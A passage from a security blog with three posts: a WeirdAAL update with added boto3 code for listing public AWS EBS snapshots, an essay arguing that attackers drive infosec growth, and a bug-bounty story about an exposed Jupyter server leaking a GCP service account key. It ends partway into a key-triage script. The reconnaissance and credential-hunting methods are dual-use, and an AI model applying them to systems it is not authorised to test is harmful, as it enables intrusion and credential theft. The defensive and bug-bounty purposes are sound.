Carnal0wnage Blog<div><br /></div><div><b>WeirdAAL update - get EC2 snapshots</b> (2020-05-17)</div><div><br /></div><div>I watched a good DEF CON talk on abusing public AWS EBS snapshots:</div><div><a href="https://www.youtube.com/watch?v=-LGR63yCTts">https://www.youtube.com/watch?v=-LGR63yCTts</a></div><div><br /></div><div>I, of course, wanted to check this out. There are tens of thousands of public snapshots in the various regions. The talk outlines what you can do with them, and Bishop Fox released a tool to do it: <a href="https://github.com/BishopFox/dufflebag" target="_blank">https://github.com/BishopFox/dufflebag</a>. I wanted to script up two weirdAAL modules: 1) for an AWS keypair you are testing, list the snapshots available to that account, and 2) for an AWS account ID, list the snapshots that account has shared publicly. The second is useful for bug bounty, or for monitoring your own org for public snapshots. 
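</div><div>Below is an added example of the same two checks done directly with boto3. It is not weirdAAL's own code, and the sample response it parses is constructed. The <i>own</i> mode lists the snapshots the tested credentials own and then asks EC2 for each snapshot's <i>createVolumePermission</i> attribute, because the listing itself does not tell you whether a snapshot is shared with the <i>all</i> group. The <i>public</i> mode uses the <i>RestorableByUserIds=all</i> filter so that only what a given account ID has shared publicly comes back. The AWS calls are isolated in one function so the rest runs offline.</div>

```python
"""Added example, not weirdAAL's code: the two snapshot checks with boto3.

own    -> snapshots owned by the account behind the credentials being tested,
          with a per-snapshot check of whether the 'all' group may restore it
public -> snapshots that a given 12-digit account ID has shared publicly

Only enumerate_snapshots() talks to AWS; the helpers are pure so they can be
run against the constructed sample below without credentials.
"""
from typing import Dict, List, Optional


def describe_params(mode: str, account_id: Optional[str] = None) -> dict:
    """Request parameters for EC2 DescribeSnapshots in each mode."""
    if mode == "own":
        return {"OwnerIds": ["self"]}          # 'self' = the calling account
    if mode == "public":
        if not (account_id and account_id.isdigit() and len(account_id) == 12):
            raise ValueError("public mode needs a 12-digit AWS account id")
        # RestorableByUserIds=['all'] keeps only snapshots shared with everyone
        return {"OwnerIds": [account_id], "RestorableByUserIds": ["all"]}
    raise ValueError(f"unknown mode {mode!r}")


def is_public(create_volume_permissions: List[dict]) -> bool:
    """True when the createVolumePermission attribute contains the 'all' group."""
    return any(p.get("Group") == "all" for p in create_volume_permissions)


def summarize(region: str, snapshots: List[dict],
              perms_by_id: Dict[str, List[dict]]) -> List[dict]:
    """Reduce DescribeSnapshots records to the fields worth reporting."""
    return [{
        "region": region,
        "id": s["SnapshotId"],
        "owner": s.get("OwnerId"),
        "size_gib": s.get("VolumeSize"),
        "encrypted": bool(s.get("Encrypted")),
        "description": s.get("Description", ""),
        "public": is_public(perms_by_id.get(s["SnapshotId"], [])),
    } for s in snapshots]


def enumerate_snapshots(mode: str, account_id: Optional[str] = None,
                        regions: Optional[List[str]] = None) -> List[dict]:
    """Live enumeration; needs credentials with AmazonEC2ReadOnlyAccess."""
    import boto3  # imported here so the pure helpers work without boto3

    session = boto3.session.Session()
    params = describe_params(mode, account_id)
    rows: List[dict] = []
    for region in regions or session.get_available_regions("ec2"):
        ec2 = session.client("ec2", region_name=region)
        snaps: List[dict] = []
        for page in ec2.get_paginator("describe_snapshots").paginate(**params):
            snaps.extend(page["Snapshots"])
        if mode == "own":
            # The listing does not say who may restore a snapshot; ask per ID.
            perms = {
                s["SnapshotId"]: ec2.describe_snapshot_attribute(
                    SnapshotId=s["SnapshotId"],
                    Attribute="createVolumePermission",
                ).get("CreateVolumePermissions", [])
                for s in snaps
            }
        else:
            # The RestorableByUserIds filter already guarantees these are public.
            perms = {s["SnapshotId"]: [{"Group": "all"}] for s in snaps}
        rows.extend(summarize(region, snaps, perms))
    return rows


# Constructed sample standing in for one DescribeSnapshots page plus the
# per-snapshot attribute lookups; not data from any real account.
SAMPLE_SNAPSHOTS = [
    {"SnapshotId": "snap-0aaa000000000001", "OwnerId": "111111111111",
     "VolumeSize": 8, "Encrypted": False, "Description": "prod-db nightly"},
    {"SnapshotId": "snap-0aaa000000000002", "OwnerId": "111111111111",
     "VolumeSize": 100, "Encrypted": True, "Description": "backup"},
]
SAMPLE_PERMS = {
    "snap-0aaa000000000001": [{"Group": "all"}],  # shared with everyone
    "snap-0aaa000000000002": [],                   # private
}


def public_in_sample() -> List[str]:
    """IDs in the sample that the 'own' check would flag as public."""
    return [r["id"] for r in summarize("us-east-1", SAMPLE_SNAPSHOTS, SAMPLE_PERMS)
            if r["public"]]


if __name__ == "__main__":
    for row in summarize("us-east-1", SAMPLE_SNAPSHOTS, SAMPLE_PERMS):
        print(row)
    # Live use: enumerate_snapshots("own") or
    #           enumerate_snapshots("public", "123456789012", regions=["us-east-1"])
```

<div>Run it with credentials in the environment to audit your own snapshots, or pass a 12-digit account ID for the public check. Walking every region means one paginated listing per region plus one attribute call per snapshot in <i>own</i> mode, so pass a region list when you know where the target lives. 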
The account you are using will need at least the <i>AmazonEC2ReadOnlyAccess</i> managed policy (which includes the <i>ec2:Describe*</i> permissions the snapshot calls need).</div><div><br /></div><div>Screenshot of the second function below</div><div><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh0fo0MrrOk8viDTB43-nU9TVyH98yNpA_7mrC1DBcZn_Pp9UQH0dSt3TozYpRF_ve6dLKtMMWlL9sPi8FoBGQOBZ-Zmbi5QTa4sAiJpBSBnQoiqF9-Q9_uOUBVNBoJqamCS4Rs7z6vxo/" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1202" data-original-width="2086" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh0fo0MrrOk8viDTB43-nU9TVyH98yNpA_7mrC1DBcZn_Pp9UQH0dSt3TozYpRF_ve6dLKtMMWlL9sPi8FoBGQOBZ-Zmbi5QTa4sAiJpBSBnQoiqF9-Q9_uOUBVNBoJqamCS4Rs7z6vxo/w640-h368/Screen+Shot+2020-05-17+at+7.38.16+PM.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">listing snapshots for a random AWS accountid</td></tr></tbody></table><div><br /></div><div>You can git clone or git pull to get the updated code from <a href="https://github.com/carnal0wnage/weirdAAL" target="_blank">https://github.com/carnal0wnage/weirdAAL</a></div><div><br /></div><div>If you just want to do it with the AWS CLI, the shell script in this gist does the same thing: <a href="https://gist.github.com/carnal0wnage/255f26c95205881319e66ddf24cfc0ac" target="_blank">https://gist.github.com/carnal0wnage/255f26c95205881319e66ddf24cfc0ac</a></div><div><br /></div><div>Posted 2020-04-27</div><div dir="ltr" id="docs-internal-guid-68f993f4-7fff-361a-b5d0-43ea2e8618f1" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">The Duality of Attackers - Or Why Bad Guys are a Good Thing™</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">It’s no secret I've been on a spiritual journey the last few years. I tell most people it’s fundamentally changed my life and how I look at the world. I’m also a hacker and I’m constantly thinking about how to apply metaphysical or spiritual concepts into my daily life. Because if they are true they should apply broadly and also to many aspects of our lives. One of the key things I’ve learned is that </span><span style="font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">perspective</span><span style="vertical-align: baseline; white-space: pre-wrap;"> drives an individual's opinion of a situation or event. Is something good? Is something bad? It all depends on the observer’s perspective of the situation.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">My first Battalion Commander in the Army when I was having my welcome to the unit meeting said something I've never forgotten. He said “On any given day it’s better to be a Soldier, a DA Civilian, or a Local National (I was in Belgium)”. This stuck with me ever since even though i didn't know what to call it at the time….perspective. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">In late 2019 the Irresponsible Open Source Tools (intentionally not linking) debate took over Infosec twitter for a few weeks. Ever since that time I've been thinking about - “Are attackers a good thing?” Not red teaming, not pentesting but straight up criminals. The real steal your shit type, not the point and laugh type, the wreck all your things, steal all the things, potentially end your business type attackers. There were several people basically stating life would be better if attackers did not exist and I wasn't so sure about this. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">TLDR; I think Yes, attackers are a Good™ thing or rather not a Bad™ thing because they force us to adapt and grow. Growth Through Struggle.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">But first, definitions:</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Perspective</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">“The art of drawing solid objects on a two-dimensional surface so as to give the right impression of their height, width, depth, and position in relation to each other when viewed from a particular point.”</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">“A particular attitude toward or way of regarding something; a point of view.”</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">From: </span><a href="https://www.lexico.com/en/definition/perspective" style="text-decoration-line: none;"><span style="vertical-align: baseline; white-space: pre-wrap;">https://www.lexico.com/en/definition/perspective</span></a><span style="vertical-align: baseline; white-space: pre-wrap;"> </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">Another way to think about perspective and how everyone can have their own is that “Everything (every person, place, thing, situation, event) is fundamentally neutral - they are neutral props with no built in meaning” [</span><a href="https://youtu.be/Cp0Vhayn8h8?t=142" style="text-decoration-line: none;"><span style="vertical-align: baseline; white-space: pre-wrap;">1</span></a><span style="vertical-align: baseline; white-space: pre-wrap;">] - the observer of the situation or event gives the event meaning.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">The meaning we put, the meaning we assign to these neutral things completely determines the effect that we get out of them. Every situation can be viewed in many different capacities and it solely depends upon how you perceive it and the association that you create with it and your beliefs about the situation or event.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">I'm currently fascinated with TV Shows that tackle this subject. <a href="https://en.wikipedia.org/wiki/Lucifer_(TV_series)" target="_blank">Lucifer</a> and <a href="https://en.wikipedia.org/wiki/Good_Omens_(TV_series)" target="_blank">Good Omens</a> come to mind where the idea that the "bad" guy is sometimes the good guy if you evaluate their actions and the "good" guy is the bad guy as dictated by their actions or listening to their superiors.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Duality</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">As hinted at by the word "dual" within it, </span><span style="font-style: italic; vertical-align: baseline; white-space: pre-wrap;">duality</span><span style="vertical-align: baseline; white-space: pre-wrap;"> refers to having two parts, often with opposite meanings, like the </span><span style="font-style: italic; vertical-align: baseline; white-space: pre-wrap;">duality</span><span style="vertical-align: baseline; white-space: pre-wrap;"> of good and evil.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">If there are two sides to a coin, metaphorically speaking, there's a duality. Peace and war, love and hate, up and down, and black and white are dualities. Another term for a duality is a dichotomy. Duality has technical meanings in geometry and physics. In geometry, duality refers to how points and planes have interchangeable roles in projective geometry. In physics, duality is the property of matter and electromagnetic radiation to be understood best through wave theory or particle theory.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">From: </span><a href="https://www.vocabulary.com/dictionary/duality" style="text-decoration-line: none;"><span style="vertical-align: baseline; white-space: pre-wrap;">https://www.vocabulary.com/dictionary/duality</span></a><span style="vertical-align: baseline; white-space: pre-wrap;"> </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 0pt; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-style: italic; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">“Your truth is truth, my truth is truth, but your truth is not necessarily my truth.”</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<div dir="ltr" id="docs-internal-guid-cf3f27ed-7fff-0458-be92-f8319df1ee27" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Understanding and being aware of duality is vital to our human experience, as it allows us to see things from ‘both sides of the coin’ and better understand ourselves and others amid the collective. Most individual’s version of ‘truth’ culminates according to their past and current experiences, social conventions, and worldly views. To put it simply, duality is the nature in which everything holds opposing truths — all of which are true — at least in a relative sense.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">From: </span><a href="https://quantumstones.com/what-is-duality-the-doorway-to-all-truths/" style="text-decoration-line: none;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://quantumstones.com/what-is-duality-the-doorway-to-all-truths/</span></a><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></span><br />
<span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbiFkeTUPaWfzB3MObH1OJupr2aK1d7C2GIyOS_J5Dv1RlcfOpw703NpiuZOzfV2PnMwFM2w3B4FqKp4RDcNnj6RSDQSb4KT_J28dBdpz4dVORE-k_F7nyduPK49liddQm6guAdcG3A0/s1600/buddha-demon.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><img border="0" data-original-height="313" data-original-width="512" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbiFkeTUPaWfzB3MObH1OJupr2aK1d7C2GIyOS_J5Dv1RlcfOpw703NpiuZOzfV2PnMwFM2w3B4FqKp4RDcNnj6RSDQSb4KT_J28dBdpz4dVORE-k_F7nyduPK49liddQm6guAdcG3A0/s320/buddha-demon.jpg" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Buddha & The Demon - Perspective</span></td></tr>
</tbody></table>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Extra Reading on Duality</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://exploringyourmind.com/jekyll-and-hyde-duality-between-good-evil/" style="text-decoration-line: none;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">https://exploringyourmind.com/jekyll-and-hyde-duality-between-good-evil/</span></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">I’ll be honest, after a lifetime growing up in the United States worrying about the next foreign country boogeyman and over a decade in the Army where the primary motivation was giving soldiers someone to “hate” it’s been quite a journey to try to see things other than a binary right/wrong & good/evil, etc. The intersection and interdependence of good and evil manifested for me (and I think plenty of others) in the following way: we don’t feel we are good unless we are fighting against evil. It’s the American Way! We can feel comfortable and secure in our own goodness only by attacking and destroying the evil outside us. I was, and still am to an extent, looking for evil to vanquish. This interdependence is at the core of Infosec. Without APT groups, criminals, malware, and every other form of virtual boogeyman (aka “the other(s)” or “the bad guys”) most of us have no reason for our Infosec existence.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Thinking of everything as fundamentally neutral has helped me drop some, but not all, of my old vocabulary and has given me space to pause and to think about how I feel about issues at a micro level and macro level. Taking that pause allows me to understand that my perspective on the situation is entirely what matters and that another person could have a TOTALLY different perspective on the situation (and Infosec twitter shows me...quite frequently does).</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Criminals, Attackers, Bad People, etc and their actions can have a multitude of perspectives.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">Take a company that gets compromised so badly they go out of business. From the perspective of the company CEO this is BAD. From another perspective, perhaps of a competing company CEO, this is GOOD, from the perspective of the attacker they got what they wanted so (GOOD) perhaps a bonus is coming, perhaps their family gets to eat or maybe they just get another BTC in their nano ledger. In-house defenders have “failed their mission” and now are out of work or maybe this was the event that finally prompted management to spend that money they’ve been asking for. Perhaps their failures were so embarrassing they have made it by name in tech-crunch articles and their careers may be over or at least paused. Perhaps they “lost” but their response was good enough that the general public thinks things are ok inside the company anyway.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">For Infosec, I’m going to make the case that attackers are GOOD; at least from my perspective (as every opinion piece is). But, I’ll attempt to lay out bullet points for rationale for my current perspective. The following can be summed as “Growth through struggle”:</span><br />
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<ul>
<li><span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Attackers force defenders to consistently up their game. Attackers constantly innovate to get around the current detection techniques and technologies.</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Attackers force Red Teams to up their game to keep up with their TTPs.</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Defenders force attackers and Red Teams to up their game to keep up with current defenses.</span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="vertical-align: baseline; white-space: pre-wrap;">Without virtual cyber boogeymen a </span><a href="https://cybersecurityventures.com/cybersecurity-market-report/" style="white-space: pre;"><span style="vertical-align: baseline; white-space: pre-wrap;">100+ billion dollar industry</span></a><span style="vertical-align: baseline; white-space: pre-wrap;"> would sell less product and be required to innovate less.</span></span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Attackers force visibility into their politics and perspectives through the investigations into their motivations and TTPs. </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">They give a large portion of Infosec a “purpose”. I’ve dedicated the last 20 years of my life in various verticals of IT to “keep bad guys out” and I'm positive I'm not alone.</span></li>
</ul>
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">If you’ve made it this far. Thank you! I realize the title is a bit click-baity and not really in line with the idea of duality or perspective but no one would have read “attackers are fundamentally neutral.” Although my hope is that are open to exploring that perspective now. I welcome your thoughts on the subject.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;">CG</span></div>
<div><br /></div><div><b>What is your GCP infra worth?...about ~$700 [Bugbounty]</b> (2020-03-13, updated 2020-03-24)</div><br />
BugBounty story #bugbountytips<br />
<br />
A “fixed, but they didn't pay the bug bounty” story (they eventually did; see the timeline)...<br />
<br />
Timeline:<br />
<ul>
<li>reported 21 Oct 2019</li>
<li>validated at Critical 23 Oct 2019</li>
<li>validated as fixed 30 Oct 2019</li>
<li>Bounty amount stated (IDR 10.000.000 = ~700 USD) 12 Nov 2019</li>
<li>Information provided for payment 16 Nov 2019</li>
<li>13 March 2020 - Never paid - blog post posted</li>
<li>19 March 2020 - received bounty of $565.86</li>
</ul>
<br />
There are lots of applications that are SaaS - <a href="https://www.youtube.com/watch?v=JVCsy-T94k4&list=UUef0TWni8ghLcJphdmDBoxw" target="_blank">Shell as a Service</a>. Jupyter Notebook is one of them: an exposed notebook server lets you run arbitrary code in its kernels and also gives you a web terminal on the host.<br />
<br />
While I was trawling Shodan looking for vulnerable boxes I came across an open Jupyter notebook server belonging to <a href="https://www.tokopedia.com/" target="_blank">Tokopedia</a>. This wasn't obvious at first, but how I identified the owner will become clear as you check out the screenshots.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0/s1600/notebooks-main-page.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="495" data-original-width="1600" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0/s640/notebooks-main-page.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Open Jupyter notebook server</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I did a post on what to do when you find a GCP service account key in a <a href="http://carnal0wnage.attackresearch.com/2019/01/i-found-gcp-service-account-tokennow.html" target="_blank">previous post</a>.<br />
<br />
This is especially important when people leave their GCP service account keys lying in the notebook server's folders:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk/s1600/Screen+Shot+2020-01-06+at+7.42.19+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="130" data-original-width="1600" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk/s640/Screen+Shot+2020-01-06+at+7.42.19+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">When you leave your service token in the folder for all to find/use</td></tr>
</tbody></table>
<br />
In this case it was base64 encoded, which is trivial to reverse:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M/s1600/token-b64decode.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1440" data-original-width="1318" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M/s320/token-b64decode.png" width="292" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">service account token b64 decoded</td></tr>
</tbody></table>
It was also in the error output of one of the Jupyter notebooks. Cell output, tracebacks included, is saved inside the .ipynb file, so a credential that was printed once stays readable long after the cell ran.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4/s1600/creds-via-notebook-error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1600" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4/s640/creds-via-notebook-error.png" width="640" /></a></div>
<br />
<br />
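The following is an added example, not code from the post: it takes a blob like the one in the folder or in the traceback above and decides whether it is a GCP service account key, whether raw JSON or base64 wrapped, returning only the fields you need to identify the owner and write the report (project_id, client_email and private_key_id) and never the key material. The sample key inside is constructed with a placeholder private key. The same scanner works for defenders run over saved .ipynb files and logs, since notebook output is persisted.<br />

```python
"""Added example (not from the post): triage a blob that might be a GCP
service account key, whether it is the raw JSON file or a base64-encoded copy
like the one found in the notebook folder, or a key buried in notebook output.

The constructed sample key below uses a placeholder private key; only the
identifying metadata is ever returned, never the key material itself.
"""
import base64
import binascii
import json
import re
from typing import List, Optional

# Fields present in every service-account key JSON that Google issues.
REQUIRED = ("type", "project_id", "private_key_id", "private_key", "client_email")

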